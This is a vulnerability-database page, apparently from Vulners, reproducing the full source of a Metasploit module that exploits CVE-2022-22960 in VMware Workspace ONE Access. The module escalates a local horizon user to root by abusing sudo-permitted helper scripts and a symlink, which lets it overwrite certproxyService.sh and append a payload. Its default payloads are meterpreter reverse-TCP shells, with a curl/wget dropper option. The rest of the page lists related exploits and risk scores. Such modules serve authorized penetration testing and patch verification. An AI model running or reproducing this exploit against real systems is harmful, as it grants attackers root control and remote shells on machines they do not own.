Vulners
Lucene search
VMware Workspace ONE Access Privilege Escalation
🗓️ 19 Apr 2023 00:00:00Reported by mr_me, jheysel-r7, metasploit.comType 
packetstorm🔗 packetstormsecurity.com👁 322 Views
| Reporter | Title | Published | Views | Family All 41 |
|---|---|---|---|---|
 | VMware Workspace ONE Remote Code Execution Exploit | 18 Apr 202300:00 | – | zdt |
| VMware Workspace ONE Access Privilege Escalation Exploit | 19 Apr 202300:00 | – | zdt |
 | Exploit for Code Injection in Vmware Identity_Manager | 1 Jun 202219:33 | – | githubexploit |
 | Threat Actors Chaining Unpatched VMware Vulnerabilities for Full System Control | 2 Jun 202212:00 | – | ics |
| Malicious Cyber Actors Continue to Exploit Log4Shell in VMware Horizon Systems | 18 Jul 202212:00 | – | ics |
| 2022 Top Routinely Exploited Vulnerabilities | 3 Aug 202312:00 | – | ics |
 | CVE-2022-22954 | 11 Apr 202200:00 | – | attackerkb |
| CVE-2022-22960 | 13 Apr 202200:00 | – | attackerkb |
 | CVE-2022-22960 | 1 May 202221:40 | – | circl |
 | VMware Multiple Products Privilege Escalation Vulnerability | 15 Apr 202200:00 | – | cisa_kev |
10
`##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Local
Rank = GoodRanking
include Msf::Exploit::EXE
include Msf::Post::File
include Msf::Post::Unix
include Msf::Exploit::FileDropper
prepend Msf::Exploit::Remote::AutoCheck
TARGET_FILE = '/opt/vmware/certproxy/bin/certproxyService.sh'.freeze
def initialize(info = {})
super(
update_info(
info,
{
'Name' => 'VMware Workspace ONE Access CVE-2022-22960',
'Description' => %q{
This module exploits CVE-2022-22960 which allows the user to overwrite the permissions of the
certproxyService.sh script so that it can be modified by the horizon user. This allows a local attacker with
the uid 1001 to escalate their privileges to root access.
},
'License' => MSF_LICENSE,
'Author' => [
'mr_me', # Discovery & PoC
'jheysel-r7' # Metasploit Module
],
'Platform' => [ 'linux', 'unix' ],
'Arch' => [ ARCH_CMD, ARCH_X86, ARCH_X64 ],
'SessionTypes' => ['shell', 'meterpreter'],
'Targets' => [
[
'Unix Command',
{
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Type' => :unix_cmd,
'DefaultOptions' => {
'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp'
}
}
],
[
'Linux Dropper',
{
'Platform' => 'linux',
'Arch' => [ARCH_X64],
'Type' => :linux_dropper,
'CmdStagerFlavor' => %i[curl wget],
'DefaultOptions' => {
'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'
}
}
]
],
'Privileged' => true,
'DefaultTarget' => 0,
'References' => [
[ 'CVE', '2022-22960' ],
['URL', 'https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html#dbconnectioncheckcontroller-dbcheck-jdbc-injection-remote-code-execution'],
['URL', 'https://github.com/sourceincite/hekate/'],
['URL', 'https://www.vmware.com/security/advisories/VMSA-2022-0011.html']
],
'DisclosureDate' => '2022-04-06',
'Notes' => {
# We're corrupting certproxyService.sh, if restoring the contents fails it won't work.
'Stability' => [CRASH_SAFE],
'Reliability' => [REPEATABLE_SESSION],
'SideEffects' => [ARTIFACTS_ON_DISK]
}
}
)
)
register_advanced_options [
OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
]
end
def lpe_trigger(execute_payload)
cert_filename = Rex::Text.rand_text_alpha(4..12)
file_contents = <<~EOF
#!/bin/bash
cp #{TARGET_FILE} #{datastore['WritableDir']}/#{@certproxy_backup}
sudo /usr/local/horizon/scripts/publishCaCert.hzn #{TARGET_FILE} #{cert_filename}
mkdir #{cert_filename}
ln -s #{TARGET_FILE} #{cert_filename}/debugConfig.txt
sudo /usr/local/horizon/scripts/gatherConfig.hzn #{cert_filename}
rm -rf #{cert_filename}
chmod 755 #{TARGET_FILE}
echo "mv /etc/ssl/certs/#{cert_filename} #{TARGET_FILE}" > #{TARGET_FILE}
echo "chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}
echo "chmod 640 #{TARGET_FILE}" >> #{TARGET_FILE}
echo "#{execute_payload}" >> #{TARGET_FILE}
echo "mv #{datastore['WritableDir']}/#{@certproxy_backup} #{TARGET_FILE} && chmod 500 #{TARGET_FILE} && chown root:root #{TARGET_FILE}" >> #{TARGET_FILE}#{' '}
sudo #{TARGET_FILE}
EOF
file_contents
end
def check
unless whoami == 'horizon'
return CheckCode::Safe('Not running as the horizon user.')
end
test = cmd_exec("sudo #{TARGET_FILE}")
unless test.include? 'basename: missing operand'
CheckCode::Safe
end
CheckCode::Appears('vulnerable')
end
def exploit
@certproxy_backup = Rex::Text.rand_text_alpha(4..12)
payload_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'
trigger_filename = Rex::Text.rand_text_alpha(4..12) + '.sh'
case target['Type']
when :unix_cmd
execute_payload = payload.encoded
when :linux_dropper
payload_path = "#{datastore['WritableDir']}/#{payload_filename}"
upload_and_chmodx(payload_path, generate_payload_exe)
execute_payload = "#{datastore['WritableDir']}/#{payload_filename}"
register_file_for_cleanup(payload_path)
else
fail_with(Failure::BadConfig, 'Invalid target specified')
end
lpe_trigger_data = lpe_trigger(execute_payload)
upload_and_chmodx("#{datastore['WritableDir']}/#{trigger_filename}", lpe_trigger_data)
register_file_for_cleanup("#{datastore['WritableDir']}/#{trigger_filename}")
print_status('Triggering the payload...')
cmd_exec("cd #{datastore['WritableDir']}; ./#{trigger_filename}")
end
end
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
19 Apr 2023 00:00Current
8.7High risk
Vulners AI Score8.7
CVSS 27.2
CVSS 3.17.8
EPSS0.72491